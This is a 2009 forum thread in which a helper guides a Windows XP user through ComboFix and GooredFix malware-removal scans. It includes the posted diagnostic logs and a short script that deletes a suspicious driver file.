[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"iKeyWorks "= "c:\progra~1\A4Tech\Keyboard\Ikeymain.exe" [2006-09-07 65536]
"IgfxTray "= "c:\windows\system32\igfxtray.exe" [2007-03-13 98304]
"HotKeysCmds "= "c:\windows\system32\hkcmd.exe" [2007-03-13 114688]
"Persistence "= "c:\windows\system32\igfxpers.exe" [2007-03-13 94208]
"Acrobat Assistant 8.0 "= "d:\program files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe" [2006-10-22 620152]
"mcagent_exe "= "c:\program files\McAfee.com\Agent\mcagent.exe" [2009-01-08 645328]
"SunJavaUpdateSched "= "c:\program files\Java\jre6\bin\jusched.exe" [2009-02-20 148888]
"AVG8_TRAY "= "c:\progra~1\AVG\AVG8\avgtray.exe" [2009-04-09 1932568]
"RTHDCPL "= "RTHDCPL.EXE" [2007-03-13 c:\windows\RTHDCPL.exe]
"SkyTel "= "SkyTel.EXE" [2007-03-13 c:\windows\SkyTel.exe]

c:\documents and settings\All Users.WINDOWS\Start Menu\Programs\Startup\
Adobe Acrobat Speed Launcher.lnk - c:\windows\Installer\{AC76BA86-1033-0000-7760-000000000003}\_SC_Acrobat.exe [2009-01-11 295606]
Adobe Acrobat Synchronizer.lnk - d:\program files\Adobe\Acrobat 8.0\Acrobat\AdobeCollabSync.exe [2006-10-23 734872]
Microsoft Office OneNote 2003 Quick Launch.lnk - d:\program files\Microsoft Office\OFFICE11\ONENOTEM.EXE [2003-08-06 51776]
Monitor Apache Servers.lnk - d:\program files\Apache Software Foundation\Apache2.2\bin\ApacheMonitor.exe [2008-12-10 41042]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter]
2009-04-09 09:17 10520 c:\windows\system32\avgrsstx.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"vidc.ffds "= ffdshow.ax
"msacm.ac3filter "= ac3filter.acm

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
SecurityProviders msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify "=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring "=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring "=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall "= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe "=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe "=
"c:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe "=
"c:\\Program Files\\NuSphere\\PhpED\\Srv.exe "=
"c:\\Program Files\\NuSphere\\PhpED\\debugger\\DbgListener.exe "=
"c:\\Program Files\\NuSphere\\PhpED\\phped.exe "=
"c:\program files\Microsoft ActiveSync\rapimgr.exe "= c:\program files\Microsoft ActiveSync\rapimgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync RAPI Manager
"c:\program files\Microsoft ActiveSync\wcescomm.exe "= c:\program files\Microsoft ActiveSync\wcescomm.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Connection Manager
"c:\program files\Microsoft ActiveSync\WCESMgr.exe "= c:\program files\Microsoft ActiveSync\WCESMgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Application
"c:\\Program Files\\Common Files\\McAfee\\MNA\\McNASvc.exe "=
"c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe "=
"c:\\Program Files\\AVG\\AVG8\\avgupd.exe "=
"c:\\Program Files\\AVG\\AVG8\\avgnsx.exe "=
"c:\\Program Files\\Skype\\Phone\\Skype.exe "=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"26675:TCP "= 26675:TCP:169.254.2.0/255.255.255.0:Enabled:ActiveSync Service

R1 ethjnevj;ethjnevj;c:\windows\system32\drivers\ethjnevj.sys [2009-04-08 136256]
S1 AvgLdx86;AVG Free AVI Loader Driver x86;c:\windows\System32\Drivers\avgldx86.sys [2009-04-09 325640]
S1 AvgTdiX;AVG Free8 Network Redirector;c:\windows\System32\Drivers\avgtdix.sys [2009-04-09 108552]
S2 Apache2.2;Apache2.2;d:\program files\Apache Software Foundation\Apache2.2\bin\httpd.exe [2008-12-10 24636]
S2 avg8wd;AVG Free8 WatchDog;c:\progra~1\AVG\AVG8\avgwdsvc.exe [2009-04-09 298264]
S2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [2009-02-11 210216]


[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{25b5fcdc-dfaf-11dd-9a80-0019d19d4b36}]
\Shell\AutoRun\command - I:\LaunchU3.exe
.
Contents of the 'Scheduled Tasks' folder

2009-01-11 c:\windows\Tasks\McQcTask.job
- c:\program files\mcafee\mqc\QcConsol.exe [2009-01-09 10:53]

2009-03-14 c:\windows\Tasks\McDefragTask.job
- c:\windows\system32\defrag.exe [2004-08-03 22:56]

2009-04-12 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1390067357-1123561945-725345543-1003.job
- c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2009-01-14 09:15]
.
- - - - ORPHANS REMOVED - - - -

HKLM-Run-<NO NAME> - (no file)


.
------- Supplementary Scan -------
.
uStart Page = about:blank
uInternet Settings,ProxyOverride = *.local
IE: Append to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert link target to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - d:\progra~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
IE: NuSphere PhpED :: Debug this page - c:\program files\NuSphere\PhpED\NuSphereIEBar.dll/1000
FF - ProfilePath - c:\documents and settings\Zeeshan Hashmi\Application Data\Mozilla\Firefox\Profiles\dtdedgo9.default\
FF - prefs.js: browser.search.defaulturl - hxxp://www.google.com/search?lr=&ie=UTF-8&oe=UTF-8&q=
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage -
FF - component: c:\program files\AVG\AVG8\Firefox\components\avgssff.dll
FF - component: c:\program files\McAfee\SiteAdvisor\components\McFFPlg.dll
FF - component: c:\program files\Mozilla Firefox\extensions\{B13721C7-F507-4982-B2E5-502A71474FED}\components\NPComponent.dll
FF - plugin: c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\1.2.141.5\npGoogleOneClick7.dll
FF - plugin: d:\program files\Adobe\Acrobat 8.0\Acrobat\browser\nppdf32.dll
.

**************************************************************************

catchme 0.3.1375 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-04-12 21:08
Windows 5.1.2600 Service Pack 2 FAT NTAPI

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MySQL]
"ImagePath "= "\ "d:\program files\MySQL\MySQL Server 5.1\bin\mysqld\" --defaults-file=\ "d:\program files\MySQL\MySQL Server 5.1\my.ini\" MySQL "
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'explorer.exe'(4520)
c:\program files\McAfee\SiteAdvisor\saHook.dll
c:\windows\system32\IKEYRFK8.DLL
.
Completion time: 2009-04-12 21:10
ComboFix-quarantined-files.txt 2009-04-12 16:10
ComboFix2.txt 2008-12-06 11:49
ComboFix3.txt 2008-12-03 11:25

Pre-Run: 8,326,512,640 bytes free
Post-Run: 9,067,626,496 bytes free

167 --- E O F --- 2009-01-11 06:39

 

Hi
Please do this.

Highlight and copy the contents of the code box below and paste it into a blank Notepad, then save it to your desktop as;

Filename: CFScript.txt
Save As Type: All Files (*.*)

Close all other windows and programs. Now drag the CFScript.txt onto ComboFix.exe and drop it, using the left mouse button.
Click here to see how to use CFScript.txt
Combofix should run and may reboot the computer when it's done. A log will open when it's complete. Post the contents of that log.

Please do not click on the ComboFix window while it is running a scan. This can cause it to stall.

**NOTE - Allow ComboFix to update if prompted.

Code:

http://www.windowsbbs.com/malware-virus-removal/83151-active-strange-issues-must-some-malware.html
KillAll::
Collect::
c:\windows\system32\drivers\ethjnevj.sys
Driver::
ethjnevj 

Please post the Combofix log.

Geri

 

ComboFix 09-04-12.03 - Zeeshan Hashmi 2009-04-13 9:29.2 - FAT32x86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.1013.354 [GMT 5:00]
Running from: c:\documents and settings\Zeeshan Hashmi\Desktop\BBS\ComboFix.exe
Command switches used :: c:\documents and settings\Zeeshan Hashmi\Desktop\BBS\CFScript.txt
AV: AVG Anti-Virus Free *On-access scanning enabled* (Updated)
AV: McAfee VirusScan *On-access scanning enabled* (Updated)
FW: McAfee Personal Firewall *enabled*
* Created a new restore point

WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !!
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

c:\windows\system32\drivers\ethjnevj.sys

.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.

-------\Service_ethjnevj


((((((((((((((((((((((((( Files Created from 2009-03-13 to 2009-04-13 )))))))))))))))))))))))))))))))
.

2009-04-13 04:27 . 2006-03-02 18:42 73728 ----a-w C:\pv.exe
2009-04-09 15:25 . 2009-04-09 15:25 -------- d--h--w c:\windows\PIF
2009-04-09 07:34 . 2009-04-09 07:34 -------- d--h--w C:\$AVG8.VAULT$
2009-04-09 04:17 . 2009-04-09 04:17 108552 ----a-w c:\windows\system32\drivers\avgtdix.sys
2009-04-09 04:17 . 2009-04-09 04:17 10520 ----a-w c:\windows\system32\avgrsstx.dll
2009-04-09 04:17 . 2009-04-09 04:17 325640 ----a-w c:\windows\system32\drivers\avgldx86.sys
2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\windows\system32\drivers\Avg
2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\documents and settings\All Users.WINDOWS\Application Data\avg8
2009-04-09 03:23 . 2009-04-09 03:23 141312 ----a-w c:\windows\system32\drivers\sp_rsdrv2.sys
2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\Spyware Terminator
2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\documents and settings\All Users.WINDOWS\Application Data\Spyware Terminator
2009-04-07 14:34 . 2009-04-07 14:34 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\MSNInstaller
2009-04-04 02:29 . 2009-04-04 02:29 192840 ----a-w c:\windows\dua.jpg
2009-03-21 03:03 . 2009-03-21 03:03 -------- d-----w c:\windows\system32\config\systemprofile\Application Data\SACore
2009-03-21 03:00 . 2009-03-21 03:00 -------- d-sh--w C:\FOUND.043
2009-03-16 15:06 . 2009-03-16 15:06 -------- d-----w c:\documents and settings\anis

.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2009-04-09 04:17 . 2009-04-09 04:17 -------- d-----w c:\program files\AVG
2009-04-09 03:23 . 2009-04-09 03:23 -------- d-----w c:\program files\Spyware Terminator
2009-03-18 04:37 . 2009-03-18 04:37 -------- d-----w c:\program files\Microsoft Silverlight
2009-03-10 14:49 . 2009-03-10 14:49 23006 ----a-w C:\ASLog.txt
2009-02-20 04:57 . 2009-02-20 04:57 410984 ----a-w c:\windows\system32\deploytk.dll
2009-02-18 08:36 . 2009-02-18 08:36 -------- d-----w c:\documents and settings\Zeeshan Hashmi\Application Data\Media Player Classic
2009-02-06 13:52 . 2009-02-06 13:52 49504 ----a-w c:\windows\system32\sirenacm.dll
2009-02-05 06:25 . 2009-02-05 06:25 44544 ------w c:\windows\AWuninstall.exe
2009-01-19 08:16 . 2009-01-10 20:54 206 ----a-w C:\realtek.log
2009-01-19 08:16 . 2007-07-03 08:55 467 ----a-w C:\RHDSetup.log
.

((((((((((((((((((((((((((((( SnapShot@2009-04-12_21.09.02.34 )))))))))))))))))))))))))))))))))))))))))
.
+ 2009-04-13 04:35 . 2009-04-13 04:35 16384 c:\windows\Temp\Perflib_Perfdata_464.dat
+ 2009-01-10 20:39 . 2009-04-13 03:05 32768 c:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
- 2009-01-10 20:39 . 2009-04-12 12:56 32768 c:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
+ 2009-01-10 20:39 . 2009-04-13 03:05 32768 c:\windows\system32\config\systemprofile\Cookies\index.dat
- 2009-01-10 20:39 . 2009-04-12 12:56 32768 c:\windows\system32\config\systemprofile\Cookies\index.dat
+ 2009-04-13 04:33 . 2005-10-20 15:02 163328 c:\windows\ERDNT\subs\ERDNT.EXE
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Skype "= "c:\program files\Skype\Phone\Skype.exe" [2008-11-07 21633320]
"Google Update "= "c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" [2009-01-14 133104]
"MSMSGS "= "c:\program files\Messenger\msmsgs.exe" [2004-08-04 1667584]
"H/PC Connection Agent "= "c:\program files\Microsoft ActiveSync\Wcescomm.exe" [2006-11-13 1289000]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"iKeyWorks "= "c:\progra~1\A4Tech\Keyboard\Ikeymain.exe" [2006-09-07 65536]
"IgfxTray "= "c:\windows\system32\igfxtray.exe" [2007-03-13 98304]
"HotKeysCmds "= "c:\windows\system32\hkcmd.exe" [2007-03-13 114688]
"Persistence "= "c:\windows\system32\igfxpers.exe" [2007-03-13 94208]
"Acrobat Assistant 8.0 "= "d:\program files\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe" [2006-10-22 620152]
"mcagent_exe "= "c:\program files\McAfee.com\Agent\mcagent.exe" [2009-01-08 645328]
"SunJavaUpdateSched "= "c:\program files\Java\jre6\bin\jusched.exe" [2009-02-20 148888]
"AVG8_TRAY "= "c:\progra~1\AVG\AVG8\avgtray.exe" [2009-04-09 1932568]
"RTHDCPL "= "RTHDCPL.EXE" [2007-03-13 c:\windows\RTHDCPL.exe]
"SkyTel "= "SkyTel.EXE" [2007-03-13 c:\windows\SkyTel.exe]

c:\documents and settings\All Users.WINDOWS\Start Menu\Programs\Startup\
Adobe Acrobat Speed Launcher.lnk - c:\windows\Installer\{AC76BA86-1033-0000-7760-000000000003}\_SC_Acrobat.exe [2009-01-11 295606]
Adobe Acrobat Synchronizer.lnk - d:\program files\Adobe\Acrobat 8.0\Acrobat\AdobeCollabSync.exe [2006-10-23 734872]
Microsoft Office OneNote 2003 Quick Launch.lnk - d:\program files\Microsoft Office\OFFICE11\ONENOTEM.EXE [2003-08-06 51776]
Monitor Apache Servers.lnk - d:\program files\Apache Software Foundation\Apache2.2\bin\ApacheMonitor.exe [2008-12-10 41042]

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter]
2009-04-09 09:17 10520 c:\windows\system32\avgrsstx.dll

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"vidc.ffds "= ffdshow.ax
"msacm.ac3filter "= ac3filter.acm

[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
SecurityProviders msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll

[HKEY_LOCAL_MACHINE\software\microsoft\security center]
"AntiVirusDisableNotify "=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring "=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring "=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall "= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe "=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe "=
"c:\\Program Files\\Yahoo!\\Messenger\\YahooMessenger.exe "=
"c:\\Program Files\\NuSphere\\PhpED\\Srv.exe "=
"c:\\Program Files\\NuSphere\\PhpED\\debugger\\DbgListener.exe "=
"c:\\Program Files\\NuSphere\\PhpED\\phped.exe "=
"c:\program files\Microsoft ActiveSync\rapimgr.exe "= c:\program files\Microsoft ActiveSync\rapimgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync RAPI Manager
"c:\program files\Microsoft ActiveSync\wcescomm.exe "= c:\program files\Microsoft ActiveSync\wcescomm.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Connection Manager
"c:\program files\Microsoft ActiveSync\WCESMgr.exe "= c:\program files\Microsoft ActiveSync\WCESMgr.exe:169.254.2.0/255.255.255.0:Enabled:ActiveSync Application
"c:\\Program Files\\Common Files\\McAfee\\MNA\\McNASvc.exe "=
"c:\\Program Files\\Windows Live\\Messenger\\msnmsgr.exe "=
"c:\\Program Files\\AVG\\AVG8\\avgupd.exe "=
"c:\\Program Files\\AVG\\AVG8\\avgnsx.exe "=
"c:\\Program Files\\Skype\\Phone\\Skype.exe "=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"26675:TCP "= 26675:TCP:169.254.2.0/255.255.255.0:Enabled:ActiveSync Service

S1 AvgLdx86;AVG Free AVI Loader Driver x86;c:\windows\System32\Drivers\avgldx86.sys [2009-04-09 325640]
S1 AvgTdiX;AVG Free8 Network Redirector;c:\windows\System32\Drivers\avgtdix.sys [2009-04-09 108552]
S2 Apache2.2;Apache2.2;d:\program files\Apache Software Foundation\Apache2.2\bin\httpd.exe [2008-12-10 24636]
S2 avg8wd;AVG Free8 WatchDog;c:\progra~1\AVG\AVG8\avgwdsvc.exe [2009-04-09 298264]
S2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [2009-02-11 210216]

.
Contents of the 'Scheduled Tasks' folder

2009-01-11 c:\windows\Tasks\McQcTask.job
- c:\program files\mcafee\mqc\QcConsol.exe [2009-01-09 10:53]

2009-03-14 c:\windows\Tasks\McDefragTask.job
- c:\windows\system32\defrag.exe [2004-08-03 22:56]

2009-04-13 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1390067357-1123561945-725345543-1003.job
- c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2009-01-14 09:15]
.
.
------- Supplementary Scan -------
.
uStart Page = about:blank
uInternet Settings,ProxyOverride = *.local
IE: Append to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert link target to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert link target to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert selected links to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
IE: Convert selected links to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
IE: Convert selection to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: Convert selection to existing PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
IE: Convert to Adobe PDF - d:\program files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
IE: E&xport to Microsoft Excel - d:\progra~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
IE: NuSphere PhpED :: Debug this page - c:\program files\NuSphere\PhpED\NuSphereIEBar.dll/1000
FF - ProfilePath - c:\documents and settings\Zeeshan Hashmi\Application Data\Mozilla\Firefox\Profiles\dtdedgo9.default\
FF - prefs.js: browser.search.defaulturl - hxxp://www.google.com/search?lr=&ie=UTF-8&oe=UTF-8&q=
FF - prefs.js: browser.search.selectedEngine - Google
FF - prefs.js: browser.startup.homepage -
FF - component: c:\program files\AVG\AVG8\Firefox\components\avgssff.dll
FF - component: c:\program files\McAfee\SiteAdvisor\components\McFFPlg.dll
FF - component: c:\program files\Mozilla Firefox\extensions\{B13721C7-F507-4982-B2E5-502A71474FED}\components\NPComponent.dll
FF - plugin: c:\documents and settings\Zeeshan Hashmi\Local Settings\Application Data\Google\Update\1.2.141.5\npGoogleOneClick7.dll
FF - plugin: d:\program files\Adobe\Acrobat 8.0\Acrobat\browser\nppdf32.dll
.

**************************************************************************

catchme 0.3.1375 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-04-13 09:38
Windows 5.1.2600 Service Pack 2 FAT NTAPI

scanning hidden processes ...

scanning hidden autostart entries ...

scanning hidden files ...

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\MySQL]
"ImagePath "= "\ "d:\program files\MySQL\MySQL Server 5.1\bin\mysqld\" --defaults-file=\ "d:\program files\MySQL\MySQL Server 5.1\my.ini\" MySQL "
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'explorer.exe'(2680)
c:\program files\McAfee\SiteAdvisor\saHook.dll
c:\windows\system32\IKEYRFK8.DLL
.
------------------------ Other Running Processes ------------------------
.
c:\program files\A4TECH\KEYBOARD\IKEYMAIN.EXE
c:\program files\AVG\AVG8\AVGTRAY.EXE
c:\program files\AVG\AVG8\AVGWDSVC.EXE
c:\program files\BONJOUR\MDNSRESPONDER.EXE
c:\program files\JAVA\JRE6\BIN\JQS.EXE
c:\program files\MICROSOFT ACTIVESYNC\RAPIMGR.EXE
c:\program files\MCAFEE\MSC\MCMSCSVC.EXE
c:\program files\COMMON FILES\MCAFEE\MNA\MCNASVC.EXE
c:\program files\AVG\AVG8\AVGRSX.EXE
c:\progra~1\AVG\AVG8\avgnsx.exe
c:\program files\COMMON FILES\MCAFEE\MCPROXY\MCPROXY.EXE
c:\program files\MCAFEE\VIRUSSCAN\MCSHIELD.EXE
c:\program files\COMMON FILES\MICROSOFT SHARED\VS7DEBUG\MDM.EXE
c:\program files\MCAFEE\MPF\MPFSRV.EXE
c:\program files\MCAFEE\MSK\MSKSRVER.EXE
d:\program files\MySQL\MySQL Server 5.1\bin\mysqld.exe
c:\program files\Spyware Terminator\sp_rsser.exe
c:\program files\Skype\Plugin Manager\skypePM.exe
c:\windows\system32\wscntfy.exe
c:\program files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
c:\progra~1\McAfee\VIRUSS~1\mcsysmon.exe
.
**************************************************************************
.
Completion time: 2009-04-13 9:40 - machine was rebooted
ComboFix-quarantined-files.txt 2009-04-13 04:40
ComboFix2.txt 2009-04-12 16:10
ComboFix3.txt 2008-12-06 11:49
ComboFix4.txt 2008-12-03 11:25

Pre-Run: 8,971,190,272 bytes free
Post-Run: 8,905,490,432 bytes free

206 --- E O F --- 2009-01-11 06:39

 

Hello Geri,

Another strange issue i have observed since I download and RUN ComboFix, now FireFox (the browser i uses always) runs abnormally. Sometimes, it loads the page, and some times, just not load anything, and shows the same page, like if I click on any link on a page, it just do nothing.

I searched and got this link.
http://forums.majorgeeks.com/showthread.php?t=155615

Is it anything related to ComboFix ?

 

Hi
Sorry for the wait, I had a storm go through and I lost my internet.

I don't believe that is the problem, I've not seen alerts on that from the developer of CF.

Please do this.

Please download [color= "#0000FF"]GooredFix[/color] and save it to your Desktop. Double-click Goored.exe to run it. Select 1. Find Goored (no fix) by typing 1 and pressing Enter. A log will open, please post the contents of that log in your next reply (it can also be found on your desktop, called Goored.txt). Note: Do not run Option #2 yet.

Thanks
Geri

 

here is the log:

GooredFix v1.92 by jpshortstuff
Log created at 13:17 on 16/04/2009 running Option #1 (Zeeshan Hashmi)
Firefox version 3.0.8 (en-US)

=====Suspect Goored Entries=====

=====Dumping Registry Values=====

[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 3.0.8\extensions]
"Plugins "= "C:\Program Files\Mozilla Firefox\plugins "

[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 3.0.8\extensions]
"Components "= "C:\Program Files\Mozilla Firefox\components "

[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]
"{3f963a5b-e555-4543-90e2-c3908898db71} "= "C:\Program Files\AVG\AVG8\Firefox "

[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]
"jqs@sun.com "= "C:\Program Files\Java\jre6\lib\deploy\jqs\ff "

[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]
"{B7082FAA-CB62-4872-9106-E42DD88EDE45} "= "C:\Program Files\McAfee\SiteAdvisor "

[HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Firefox\extensions]
"{1650a312-02bc-40ee-977e-83f158701739} "= "C:\Program Files\SiteAdvisor\FF1 "